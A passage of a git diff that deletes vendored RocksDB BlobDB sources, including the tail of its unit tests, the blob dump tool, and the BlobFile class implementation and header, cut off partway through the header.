-  VerifyDB(db, data);
-  delete db;
-  db = nullptr;
-
-  // Open as blob db. Verify it can read existing data.
-  Open();
-  VerifyDB(blob_db_, data);
-  for (size_t i = 0; i < kNumIteration; i++) {
-    auto key_index = rnd.Next() % kNumKey;
-    std::string key = "key" + ToString(key_index);
-    is_blob[key_index] = true;
-    PutRandom(blob_db_, key, &rnd, &data);
-  }
-  VerifyDB(blob_db_, data);
-  delete blob_db_;
-  blob_db_ = nullptr;
-
-  // Verify plain db return error for keys written by blob db.
-  ASSERT_OK(DB::Open(options, dbname_, &db));
-  std::string value;
-  for (size_t i = 0; i < kNumKey; i++) {
-    std::string key = "key" + ToString(i);
-    Status s = db->Get(ReadOptions(), key, &value);
-    if (data.count(key) == 0) {
-      ASSERT_TRUE(s.IsNotFound());
-    } else if (is_blob[i]) {
-      ASSERT_TRUE(s.IsNotSupported());
-    } else {
-      ASSERT_OK(s);
-      ASSERT_EQ(data[key], value);
-    }
-  }
-  delete db;
-}
-
-// Test to verify that a NoSpace IOError Status is returned on reaching
-// blob_dir_size limit.
-TEST_F(BlobDBTest, OutOfSpace) {
-  // Use mock env to stop wall clock.
-  Options options;
-  options.env = mock_env_.get();
-  BlobDBOptions bdb_options;
-  bdb_options.blob_dir_size = 150;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options);
-
-  // Each stored blob has an overhead of about 42 bytes currently.
-  // So a small key + a 100 byte blob should take up ~150 bytes in the db.
-  std::string value(100, 'v');
-  ASSERT_OK(blob_db_->PutWithTTL(WriteOptions(), "key1", value, 60));
-
-  // Putting another blob should fail as ading it would exceed the blob_dir_size
-  // limit.
-  Status s = blob_db_->PutWithTTL(WriteOptions(), "key2", value, 60);
-  ASSERT_TRUE(s.IsIOError());
-  ASSERT_TRUE(s.IsNoSpace());
-}
-
-TEST_F(BlobDBTest, EvictOldestFileWhenCloseToSpaceLimit) {
-  // Use mock env to stop wall clock.
-  Options options;
-  BlobDBOptions bdb_options;
-  bdb_options.blob_dir_size = 270;
-  bdb_options.blob_file_size = 100;
-  bdb_options.disable_background_tasks = true;
-  bdb_options.is_fifo = true;
-  Open(bdb_options);
-
-  // Each stored blob has an overhead of 32 bytes currently.
-  // So a 100 byte blob should take up 132 bytes.
-  std::string value(100, 'v');
-  ASSERT_OK(blob_db_->PutWithTTL(WriteOptions(), "key1", value, 10));
-
-  auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_);
-  auto blob_files = bdb_impl->TEST_GetBlobFiles();
-  ASSERT_EQ(1, blob_files.size());
-
-  // Adding another 100 byte blob would take the total size to 264 bytes
-  // (2*132), which is more than 90% of blob_dir_size. So, the oldest file
-  // should be evicted and put in obsolete files list.
-  ASSERT_OK(blob_db_->PutWithTTL(WriteOptions(), "key2", value, 60));
-
-  auto obsolete_files = bdb_impl->TEST_GetObsoleteFiles();
-  ASSERT_EQ(1, obsolete_files.size());
-  ASSERT_TRUE(obsolete_files[0]->Immutable());
-  ASSERT_EQ(blob_files[0]->BlobFileNumber(),
-            obsolete_files[0]->BlobFileNumber());
-
-  bdb_impl->TEST_DeleteObsoleteFiles();
-  obsolete_files = bdb_impl->TEST_GetObsoleteFiles();
-  ASSERT_TRUE(obsolete_files.empty());
-}
-
-TEST_F(BlobDBTest, InlineSmallValues) {
-  constexpr uint64_t kMaxExpiration = 1000;
-  Random rnd(301);
-  BlobDBOptions bdb_options;
-  bdb_options.ttl_range_secs = kMaxExpiration;
-  bdb_options.min_blob_size = 100;
-  bdb_options.blob_file_size = 256 * 1000 * 1000;
-  bdb_options.disable_background_tasks = true;
-  Options options;
-  options.env = mock_env_.get();
-  mock_env_->set_current_time(0);
-  Open(bdb_options, options);
-  std::map<std::string, std::string> data;
-  std::map<std::string, KeyVersion> versions;
-  SequenceNumber first_non_ttl_seq = kMaxSequenceNumber;
-  SequenceNumber first_ttl_seq = kMaxSequenceNumber;
-  SequenceNumber last_non_ttl_seq = 0;
-  SequenceNumber last_ttl_seq = 0;
-  for (size_t i = 0; i < 1000; i++) {
-    bool is_small_value = rnd.Next() % 2;
-    bool has_ttl = rnd.Next() % 2;
-    uint64_t expiration = rnd.Next() % kMaxExpiration;
-    int len = is_small_value ? 50 : 200;
-    std::string key = "key" + ToString(i);
-    std::string value = test::RandomHumanReadableString(&rnd, len);
-    std::string blob_index;
-    data[key] = value;
-    SequenceNumber sequence = blob_db_->GetLatestSequenceNumber() + 1;
-    if (!has_ttl) {
-      ASSERT_OK(blob_db_->Put(WriteOptions(), key, value));
-    } else {
-      ASSERT_OK(blob_db_->PutUntil(WriteOptions(), key, value, expiration));
-    }
-    ASSERT_EQ(blob_db_->GetLatestSequenceNumber(), sequence);
-    versions[key] =
-        KeyVersion(key, value, sequence,
-                   (is_small_value && !has_ttl) ? kTypeValue : kTypeBlobIndex);
-    if (!is_small_value) {
-      if (!has_ttl) {
-        first_non_ttl_seq = std::min(first_non_ttl_seq, sequence);
-        last_non_ttl_seq = std::max(last_non_ttl_seq, sequence);
-      } else {
-        first_ttl_seq = std::min(first_ttl_seq, sequence);
-        last_ttl_seq = std::max(last_ttl_seq, sequence);
-      }
-    }
-  }
-  VerifyDB(data);
-  VerifyBaseDB(versions);
-  auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_);
-  auto blob_files = bdb_impl->TEST_GetBlobFiles();
-  ASSERT_EQ(2, blob_files.size());
-  std::shared_ptr<BlobFile> non_ttl_file;
-  std::shared_ptr<BlobFile> ttl_file;
-  if (blob_files[0]->HasTTL()) {
-    ttl_file = blob_files[0];
-    non_ttl_file = blob_files[1];
-  } else {
-    non_ttl_file = blob_files[0];
-    ttl_file = blob_files[1];
-  }
-  ASSERT_FALSE(non_ttl_file->HasTTL());
-  ASSERT_EQ(first_non_ttl_seq, non_ttl_file->GetSequenceRange().first);
-  ASSERT_EQ(last_non_ttl_seq, non_ttl_file->GetSequenceRange().second);
-  ASSERT_TRUE(ttl_file->HasTTL());
-  ASSERT_EQ(first_ttl_seq, ttl_file->GetSequenceRange().first);
-  ASSERT_EQ(last_ttl_seq, ttl_file->GetSequenceRange().second);
-}
-
-TEST_F(BlobDBTest, CompactionFilterNotSupported) {
-  class TestCompactionFilter : public CompactionFilter {
-    virtual const char *Name() const { return "TestCompactionFilter"; }
-  };
-  class TestCompactionFilterFactory : public CompactionFilterFactory {
-    virtual const char *Name() const { return "TestCompactionFilterFactory"; }
-    virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-        const CompactionFilter::Context & /*context*/) {
-      return std::unique_ptr<CompactionFilter>(new TestCompactionFilter());
-    }
-  };
-  for (int i = 0; i < 2; i++) {
-    Options options;
-    if (i == 0) {
-      options.compaction_filter = new TestCompactionFilter();
-    } else {
-      options.compaction_filter_factory.reset(
-          new TestCompactionFilterFactory());
-    }
-    ASSERT_TRUE(TryOpen(BlobDBOptions(), options).IsNotSupported());
-    delete options.compaction_filter;
-  }
-}
-
-TEST_F(BlobDBTest, FilterExpiredBlobIndex) {
-  constexpr size_t kNumKeys = 100;
-  constexpr size_t kNumPuts = 1000;
-  constexpr uint64_t kMaxExpiration = 1000;
-  constexpr uint64_t kCompactTime = 500;
-  constexpr uint64_t kMinBlobSize = 100;
-  Random rnd(301);
-  mock_env_->set_current_time(0);
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = kMinBlobSize;
-  bdb_options.disable_background_tasks = true;
-  Options options;
-  options.env = mock_env_.get();
-  Open(bdb_options, options);
-
-  std::map<std::string, std::string> data;
-  std::map<std::string, std::string> data_after_compact;
-  for (size_t i = 0; i < kNumPuts; i++) {
-    bool is_small_value = rnd.Next() % 2;
-    bool has_ttl = rnd.Next() % 2;
-    uint64_t expiration = rnd.Next() % kMaxExpiration;
-    int len = is_small_value ? 10 : 200;
-    std::string key = "key" + ToString(rnd.Next() % kNumKeys);
-    std::string value = test::RandomHumanReadableString(&rnd, len);
-    if (!has_ttl) {
-      if (is_small_value) {
-        std::string blob_entry;
-        BlobIndex::EncodeInlinedTTL(&blob_entry, expiration, value);
-        // Fake blob index with TTL. See what it will do.
-        ASSERT_GT(kMinBlobSize, blob_entry.size());
-        value = blob_entry;
-      }
-      ASSERT_OK(Put(key, value));
-      data_after_compact[key] = value;
-    } else {
-      ASSERT_OK(PutUntil(key, value, expiration));
-      if (expiration <= kCompactTime) {
-        data_after_compact.erase(key);
-      } else {
-        data_after_compact[key] = value;
-      }
-    }
-    data[key] = value;
-  }
-  VerifyDB(data);
-
-  mock_env_->set_current_time(kCompactTime);
-  // Take a snapshot before compaction. Make sure expired blob indexes is
-  // filtered regardless of snapshot.
-  const Snapshot *snapshot = blob_db_->GetSnapshot();
-  // Issue manual compaction to trigger compaction filter.
-  ASSERT_OK(blob_db_->CompactRange(CompactRangeOptions(),
-                                   blob_db_->DefaultColumnFamily(), nullptr,
-                                   nullptr));
-  blob_db_->ReleaseSnapshot(snapshot);
-  // Verify expired blob index are filtered.
-  std::vector<KeyVersion> versions;
-  GetAllKeyVersions(blob_db_, "", "", &versions);
-  ASSERT_EQ(data_after_compact.size(), versions.size());
-  for (auto &version : versions) {
-    ASSERT_TRUE(data_after_compact.count(version.user_key) > 0);
-  }
-  VerifyDB(data_after_compact);
-}
-
-}  //  namespace blob_db
-}  //  namespace rocksdb
-
-// A black-box test for the ttl wrapper around rocksdb
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as BlobDB is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_dump_tool.cc b/thirdparty/rocksdb/utilities/blob_db/blob_dump_tool.cc
deleted file mode 100644
index b7ae816..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_dump_tool.cc
+++ /dev/null
@@ -1,222 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "utilities/blob_db/blob_dump_tool.h"
-#include <inttypes.h>
-#include <stdio.h>
-#include <iostream>
-#include <memory>
-#include <string>
-#include "port/port.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/env.h"
-#include "util/coding.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-BlobDumpTool::BlobDumpTool()
-    : reader_(nullptr), buffer_(nullptr), buffer_size_(0) {}
-
-Status BlobDumpTool::Run(const std::string& filename, DisplayType show_key,
-                         DisplayType show_blob) {
-  Status s;
-  Env* env = Env::Default();
-  s = env->FileExists(filename);
-  if (!s.ok()) {
-    return s;
-  }
-  uint64_t file_size = 0;
-  s = env->GetFileSize(filename, &file_size);
-  if (!s.ok()) {
-    return s;
-  }
-  std::unique_ptr<RandomAccessFile> file;
-  s = env->NewRandomAccessFile(filename, &file, EnvOptions());
-  if (!s.ok()) {
-    return s;
-  }
-  if (file_size == 0) {
-    return Status::Corruption("File is empty.");
-  }
-  reader_.reset(new RandomAccessFileReader(std::move(file), filename));
-  uint64_t offset = 0;
-  uint64_t footer_offset = 0;
-  s = DumpBlobLogHeader(&offset);
-  if (!s.ok()) {
-    return s;
-  }
-  s = DumpBlobLogFooter(file_size, &footer_offset);
-  if (!s.ok()) {
-    return s;
-  }
-  if (show_key != DisplayType::kNone) {
-    while (offset < footer_offset) {
-      s = DumpRecord(show_key, show_blob, &offset);
-      if (!s.ok()) {
-        return s;
-      }
-    }
-  }
-  return s;
-}
-
-Status BlobDumpTool::Read(uint64_t offset, size_t size, Slice* result) {
-  if (buffer_size_ < size) {
-    if (buffer_size_ == 0) {
-      buffer_size_ = 4096;
-    }
-    while (buffer_size_ < size) {
-      buffer_size_ *= 2;
-    }
-    buffer_.reset(new char[buffer_size_]);
-  }
-  Status s = reader_->Read(offset, size, result, buffer_.get());
-  if (!s.ok()) {
-    return s;
-  }
-  if (result->size() != size) {
-    return Status::Corruption("Reach the end of the file unexpectedly.");
-  }
-  return s;
-}
-
-Status BlobDumpTool::DumpBlobLogHeader(uint64_t* offset) {
-  Slice slice;
-  Status s = Read(0, BlobLogHeader::kSize, &slice);
-  if (!s.ok()) {
-    return s;
-  }
-  BlobLogHeader header;
-  s = header.DecodeFrom(slice);
-  if (!s.ok()) {
-    return s;
-  }
-  fprintf(stdout, "Blob log header:\n");
-  fprintf(stdout, "  Version          : %" PRIu32 "\n", header.version);
-  fprintf(stdout, "  Column Family ID : %" PRIu32 "\n",
-          header.column_family_id);
-  std::string compression_str;
-  if (!GetStringFromCompressionType(&compression_str, header.compression)
-           .ok()) {
-    compression_str = "Unrecongnized compression type (" +
-                      ToString((int)header.compression) + ")";
-  }
-  fprintf(stdout, "  Compression      : %s\n", compression_str.c_str());
-  fprintf(stdout, "  Expiration range : %s\n",
-          GetString(header.expiration_range).c_str());
-  *offset = BlobLogHeader::kSize;
-  return s;
-}
-
-Status BlobDumpTool::DumpBlobLogFooter(uint64_t file_size,
-                                       uint64_t* footer_offset) {
-  auto no_footer = [&]() {
-    *footer_offset = file_size;
-    fprintf(stdout, "No blob log footer.\n");
-    return Status::OK();
-  };
-  if (file_size < BlobLogHeader::kSize + BlobLogFooter::kSize) {
-    return no_footer();
-  }
-  Slice slice;
-  *footer_offset = file_size - BlobLogFooter::kSize;
-  Status s = Read(*footer_offset, BlobLogFooter::kSize, &slice);
-  if (!s.ok()) {
-    return s;
-  }
-  BlobLogFooter footer;
-  s = footer.DecodeFrom(slice);
-  if (!s.ok()) {
-    return s;
-  }
-  fprintf(stdout, "Blob log footer:\n");
-  fprintf(stdout, "  Blob count       : %" PRIu64 "\n", footer.blob_count);
-  fprintf(stdout, "  Expiration Range : %s\n",
-          GetString(footer.expiration_range).c_str());
-  fprintf(stdout, "  Sequence Range   : %s\n",
-          GetString(footer.sequence_range).c_str());
-  return s;
-}
-
-Status BlobDumpTool::DumpRecord(DisplayType show_key, DisplayType show_blob,
-                                uint64_t* offset) {
-  fprintf(stdout, "Read record with offset 0x%" PRIx64 " (%" PRIu64 "):\n",
-          *offset, *offset);
-  Slice slice;
-  Status s = Read(*offset, BlobLogRecord::kHeaderSize, &slice);
-  if (!s.ok()) {
-    return s;
-  }
-  BlobLogRecord record;
-  s = record.DecodeHeaderFrom(slice);
-  if (!s.ok()) {
-    return s;
-  }
-  uint64_t key_size = record.key_size;
-  uint64_t value_size = record.value_size;
-  fprintf(stdout, "  key size   : %" PRIu64 "\n", key_size);
-  fprintf(stdout, "  value size : %" PRIu64 "\n", value_size);
-  fprintf(stdout, "  expiration : %" PRIu64 "\n", record.expiration);
-  *offset += BlobLogRecord::kHeaderSize;
-  s = Read(*offset, key_size + value_size, &slice);
-  if (!s.ok()) {
-    return s;
-  }
-  if (show_key != DisplayType::kNone) {
-    fprintf(stdout, "  key        : ");
-    DumpSlice(Slice(slice.data(), key_size), show_key);
-    if (show_blob != DisplayType::kNone) {
-      fprintf(stdout, "  blob       : ");
-      DumpSlice(Slice(slice.data() + key_size, value_size), show_blob);
-    }
-  }
-  *offset += key_size + value_size;
-  return s;
-}
-
-void BlobDumpTool::DumpSlice(const Slice s, DisplayType type) {
-  if (type == DisplayType::kRaw) {
-    fprintf(stdout, "%s\n", s.ToString().c_str());
-  } else if (type == DisplayType::kHex) {
-    fprintf(stdout, "%s\n", s.ToString(true /*hex*/).c_str());
-  } else if (type == DisplayType::kDetail) {
-    char buf[100];
-    for (size_t i = 0; i < s.size(); i += 16) {
-      memset(buf, 0, sizeof(buf));
-      for (size_t j = 0; j < 16 && i + j < s.size(); j++) {
-        unsigned char c = s[i + j];
-        snprintf(buf + j * 3 + 15, 2, "%x", c >> 4);
-        snprintf(buf + j * 3 + 16, 2, "%x", c & 0xf);
-        snprintf(buf + j + 65, 2, "%c", (0x20 <= c && c <= 0x7e) ? c : '.');
-      }
-      for (size_t p = 0; p < sizeof(buf) - 1; p++) {
-        if (buf[p] == 0) {
-          buf[p] = ' ';
-        }
-      }
-      fprintf(stdout, "%s\n", i == 0 ? buf + 15 : buf);
-    }
-  }
-}
-
-template <class T>
-std::string BlobDumpTool::GetString(std::pair<T, T> p) {
-  if (p.first == 0 && p.second == 0) {
-    return "nil";
-  }
-  return "(" + ToString(p.first) + ", " + ToString(p.second) + ")";
-}
-
-}  // namespace blob_db
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_dump_tool.h b/thirdparty/rocksdb/utilities/blob_db/blob_dump_tool.h
deleted file mode 100644
index abba91d..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_dump_tool.h
+++ /dev/null
@@ -1,52 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <memory>
-#include <string>
-#include <utility>
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "util/file_reader_writer.h"
-#include "utilities/blob_db/blob_log_format.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-class BlobDumpTool {
- public:
-  enum class DisplayType {
-    kNone,
-    kRaw,
-    kHex,
-    kDetail,
-  };
-
-  BlobDumpTool();
-
-  Status Run(const std::string& filename, DisplayType key_type,
-             DisplayType blob_type);
-
- private:
-  std::unique_ptr<RandomAccessFileReader> reader_;
-  std::unique_ptr<char> buffer_;
-  size_t buffer_size_;
-
-  Status Read(uint64_t offset, size_t size, Slice* result);
-  Status DumpBlobLogHeader(uint64_t* offset);
-  Status DumpBlobLogFooter(uint64_t file_size, uint64_t* footer_offset);
-  Status DumpRecord(DisplayType show_key, DisplayType show_blob,
-                    uint64_t* offset);
-  void DumpSlice(const Slice s, DisplayType type);
-
-  template <class T>
-  std::string GetString(std::pair<T, T> p);
-};
-
-}  // namespace blob_db
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_file.cc b/thirdparty/rocksdb/utilities/blob_db/blob_file.cc
deleted file mode 100644
index 162f364..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_file.cc
+++ /dev/null
@@ -1,242 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-#include "utilities/blob_db/blob_file.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <stdio.h>
-
-#include <algorithm>
-#include <memory>
-
-#include "db/column_family.h"
-#include "db/db_impl.h"
-#include "db/dbformat.h"
-#include "util/filename.h"
-#include "util/logging.h"
-#include "utilities/blob_db/blob_db_impl.h"
-
-namespace rocksdb {
-
-namespace blob_db {
-
-BlobFile::BlobFile()
-    : parent_(nullptr),
-      file_number_(0),
-      has_ttl_(false),
-      compression_(kNoCompression),
-      blob_count_(0),
-      gc_epoch_(-1),
-      file_size_(0),
-      deleted_count_(0),
-      deleted_size_(0),
-      closed_(false),
-      obsolete_(false),
-      gc_once_after_open_(false),
-      expiration_range_({0, 0}),
-      sequence_range_({kMaxSequenceNumber, 0}),
-      last_access_(-1),
-      last_fsync_(0),
-      header_valid_(false) {}
-
-BlobFile::BlobFile(const BlobDBImpl* p, const std::string& bdir, uint64_t fn)
-    : parent_(p),
-      path_to_dir_(bdir),
-      file_number_(fn),
-      has_ttl_(false),
-      compression_(kNoCompression),
-      blob_count_(0),
-      gc_epoch_(-1),
-      file_size_(0),
-      deleted_count_(0),
-      deleted_size_(0),
-      closed_(false),
-      obsolete_(false),
-      gc_once_after_open_(false),
-      expiration_range_({0, 0}),
-      sequence_range_({kMaxSequenceNumber, 0}),
-      last_access_(-1),
-      last_fsync_(0),
-      header_valid_(false) {}
-
-BlobFile::~BlobFile() {
-  if (obsolete_) {
-    std::string pn(PathName());
-    Status s = Env::Default()->DeleteFile(PathName());
-    if (!s.ok()) {
-      // ROCKS_LOG_INFO(db_options_.info_log,
-      // "File could not be deleted %s", pn.c_str());
-    }
-  }
-}
-
-uint32_t BlobFile::column_family_id() const {
-  // TODO(yiwu): Should return column family id encoded in blob file after
-  // we add blob db column family support.
-  return reinterpret_cast<ColumnFamilyHandle*>(parent_->DefaultColumnFamily())
-      ->GetID();
-}
-
-std::string BlobFile::PathName() const {
-  return BlobFileName(path_to_dir_, file_number_);
-}
-
-std::shared_ptr<Reader> BlobFile::OpenSequentialReader(
-    Env* env, const DBOptions& db_options,
-    const EnvOptions& env_options) const {
-  std::unique_ptr<SequentialFile> sfile;
-  Status s = env->NewSequentialFile(PathName(), &sfile, env_options);
-  if (!s.ok()) {
-    // report something here.
-    return nullptr;
-  }
-
-  std::unique_ptr<SequentialFileReader> sfile_reader;
-  sfile_reader.reset(new SequentialFileReader(std::move(sfile)));
-
-  std::shared_ptr<Reader> log_reader =
-      std::make_shared<Reader>(db_options.info_log, std::move(sfile_reader));
-
-  return log_reader;
-}
-
-std::string BlobFile::DumpState() const {
-  char str[1000];
-  snprintf(str, sizeof(str),
-           "path: %s fn: %" PRIu64 " blob_count: %" PRIu64 " gc_epoch: %" PRIu64
-           " file_size: %" PRIu64 " deleted_count: %" PRIu64
-           " deleted_size: %" PRIu64
-           " closed: %d obsolete: %d expiration_range: (%" PRIu64 ", %" PRIu64
-           ") sequence_range: (%" PRIu64 " %" PRIu64 "), writer: %d reader: %d",
-           path_to_dir_.c_str(), file_number_, blob_count_.load(),
-           gc_epoch_.load(), file_size_.load(), deleted_count_, deleted_size_,
-           closed_.load(), obsolete_.load(), expiration_range_.first,
-           expiration_range_.second, sequence_range_.first,
-           sequence_range_.second, (!!log_writer_), (!!ra_file_reader_));
-  return str;
-}
-
-void BlobFile::MarkObsolete(SequenceNumber sequence) {
-  obsolete_sequence_ = sequence;
-  obsolete_.store(true);
-}
-
-bool BlobFile::NeedsFsync(bool hard, uint64_t bytes_per_sync) const {
-  assert(last_fsync_ <= file_size_);
-  return (hard) ? file_size_ > last_fsync_
-                : (file_size_ - last_fsync_) >= bytes_per_sync;
-}
-
-Status BlobFile::WriteFooterAndCloseLocked() {
-  ROCKS_LOG_INFO(parent_->db_options_.info_log,
-                 "File is being closed after footer %s", PathName().c_str());
-
-  BlobLogFooter footer;
-  footer.blob_count = blob_count_;
-  if (HasTTL()) {
-    footer.expiration_range = expiration_range_;
-  }
-
-  footer.sequence_range = sequence_range_;
-
-  // this will close the file and reset the Writable File Pointer.
-  Status s = log_writer_->AppendFooter(footer);
-  if (s.ok()) {
-    closed_ = true;
-    file_size_ += BlobLogFooter::kSize;
-  } else {
-    ROCKS_LOG_ERROR(parent_->db_options_.info_log,
-                    "Failure to read Header for blob-file %s",
-                    PathName().c_str());
-  }
-  // delete the sequential writer
-  log_writer_.reset();
-  return s;
-}
-
-Status BlobFile::ReadFooter(BlobLogFooter* bf) {
-  if (file_size_ < (BlobLogHeader::kSize + BlobLogFooter::kSize)) {
-    return Status::IOError("File does not have footer", PathName());
-  }
-
-  uint64_t footer_offset = file_size_ - BlobLogFooter::kSize;
-  // assume that ra_file_reader_ is valid before we enter this
-  assert(ra_file_reader_);
-
-  Slice result;
-  char scratch[BlobLogFooter::kSize + 10];
-  Status s = ra_file_reader_->Read(footer_offset, BlobLogFooter::kSize, &result,
-                                   scratch);
-  if (!s.ok()) return s;
-  if (result.size() != BlobLogFooter::kSize) {
-    // should not happen
-    return Status::IOError("EOF reached before footer");
-  }
-
-  s = bf->DecodeFrom(result);
-  return s;
-}
-
-Status BlobFile::SetFromFooterLocked(const BlobLogFooter& footer) {
-  // assume that file has been fully fsync'd
-  last_fsync_.store(file_size_);
-  blob_count_ = footer.blob_count;
-  expiration_range_ = footer.expiration_range;
-  sequence_range_ = footer.sequence_range;
-  closed_ = true;
-  return Status::OK();
-}
-
-void BlobFile::Fsync() {
-  if (log_writer_.get()) {
-    log_writer_->Sync();
-    last_fsync_.store(file_size_.load());
-  }
-}
-
-void BlobFile::CloseRandomAccessLocked() {
-  ra_file_reader_.reset();
-  last_access_ = -1;
-}
-
-std::shared_ptr<RandomAccessFileReader> BlobFile::GetOrOpenRandomAccessReader(
-    Env* env, const EnvOptions& env_options, bool* fresh_open) {
-  *fresh_open = false;
-  int64_t current_time = 0;
-  env->GetCurrentTime(&current_time);
-  last_access_.store(current_time);
-
-  {
-    ReadLock lockbfile_r(&mutex_);
-    if (ra_file_reader_) return ra_file_reader_;
-  }
-
-  WriteLock lockbfile_w(&mutex_);
-  if (ra_file_reader_) return ra_file_reader_;
-
-  std::unique_ptr<RandomAccessFile> rfile;
-  Status s = env->NewRandomAccessFile(PathName(), &rfile, env_options);
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(parent_->db_options_.info_log,
-                    "Failed to open blob file for random-read: %s status: '%s'"
-                    " exists: '%s'",
-                    PathName().c_str(), s.ToString().c_str(),
-                    env->FileExists(PathName()).ToString().c_str());
-    return nullptr;
-  }
-
-  ra_file_reader_ = std::make_shared<RandomAccessFileReader>(std::move(rfile),
-                                                             PathName());
-  *fresh_open = true;
-  return ra_file_reader_;
-}
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_file.h b/thirdparty/rocksdb/utilities/blob_db/blob_file.h
deleted file mode 100644
index 4085cfe..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_file.h
+++ /dev/null
@@ -1,216 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <atomic>
-#include <memory>
-
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "util/file_reader_writer.h"
-#include "utilities/blob_db/blob_log_format.h"
-#include "utilities/blob_db/blob_log_reader.h"
-#include "utilities/blob_db/blob_log_writer.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-class BlobDBImpl;
-
-class BlobFile {
-  friend class BlobDBImpl;
-  friend struct blobf_compare_ttl;
-
- private:
-  // access to parent
-  const BlobDBImpl* parent_;
-
-  // path to blob directory
-  std::string path_to_dir_;
-
-  // the id of the file.
-  // the above 2 are created during file creation and never changed
-  // after that
-  uint64_t file_number_;
-
-  // If true, the keys in this file all has TTL. Otherwise all keys don't
-  // have TTL.
-  bool has_ttl_;
-
-  // Compression type of blobs in the file
-  CompressionType compression_;
-
-  // number of blobs in the file
-  std::atomic<uint64_t> blob_count_;
-
-  // the file will be selected for GC in this future epoch
-  std::atomic<int64_t> gc_epoch_;
-
-  // size of the file
-  std::atomic<uint64_t> file_size_;
-
-  // number of blobs in this particular file which have been evicted
-  uint64_t deleted_count_;
-
-  // size of deleted blobs (used by heuristic to select file for GC)
-  uint64_t deleted_size_;
-
-  BlobLogHeader header_;
-
-  // closed_ = true implies the file is no more mutable
-  // no more blobs will be appended and the footer has been written out
-  std::atomic<bool> closed_;
-
-  // has a pass of garbage collection successfully finished on this file
-  // obsolete_ still needs to do iterator/snapshot checks
-  std::atomic<bool> obsolete_;
-
-  // The last sequence number by the time the file marked as obsolete.
-  // Data in this file is visible to a snapshot taken before the sequence.
-  SequenceNumber obsolete_sequence_;
-
-  // should this file been gc'd once to reconcile lost deletes/compactions
-  std::atomic<bool> gc_once_after_open_;
-
-  ExpirationRange expiration_range_;
-
-  SequenceRange sequence_range_;
-
-  // Sequential/Append writer for blobs
-  std::shared_ptr<Writer> log_writer_;
-
-  // random access file reader for GET calls
-  std::shared_ptr<RandomAccessFileReader> ra_file_reader_;
-
-  // This Read-Write mutex is per file specific and protects
-  // all the datastructures
-  mutable port::RWMutex mutex_;
-
-  // time when the random access reader was last created.
-  std::atomic<std::int64_t> last_access_;
-
-  // last time file was fsync'd/fdatasyncd
-  std::atomic<uint64_t> last_fsync_;
-
-  bool header_valid_;
-
-  SequenceNumber garbage_collection_finish_sequence_;
-
- public:
-  BlobFile();
-
-  BlobFile(const BlobDBImpl* parent, const std::string& bdir, uint64_t fnum);
-
-  ~BlobFile();
-
-  uint32_t column_family_id() const;
-
-  // Returns log file's pathname relative to the main db dir
-  // Eg. For a live-log-file = blob_dir/000003.blob
-  std::string PathName() const;
-
-  // Primary identifier for blob file.
-  // once the file is created, this never changes
-  uint64_t BlobFileNumber() const { return file_number_; }
-
-  // the following functions are atomic, and don't need
-  // read lock
-  uint64_t BlobCount() const {
-    return blob_count_.load(std::memory_order_acquire);
-  }
-
-  std::string DumpState() const;
-
-  // if the file has gone through GC and blobs have been relocated
-  bool Obsolete() const {
-    assert(Immutable() || !obsolete_.load());
-    return obsolete_.load();
-  }
-
-  // Mark file as obsolete by garbage collection. The file is not visible to
-  // snapshots with sequence greater or equal to the given sequence.
-  void MarkObsolete(SequenceNumber sequence);
-
-  SequenceNumber GetObsoleteSequence() const {
-    assert(Obsolete());
-    return obsolete_sequence_;
-  }
-
-  // if the file is not taking any more appends.
-  bool Immutable() const { return closed_.load(); }
-
-  // we will assume this is atomic
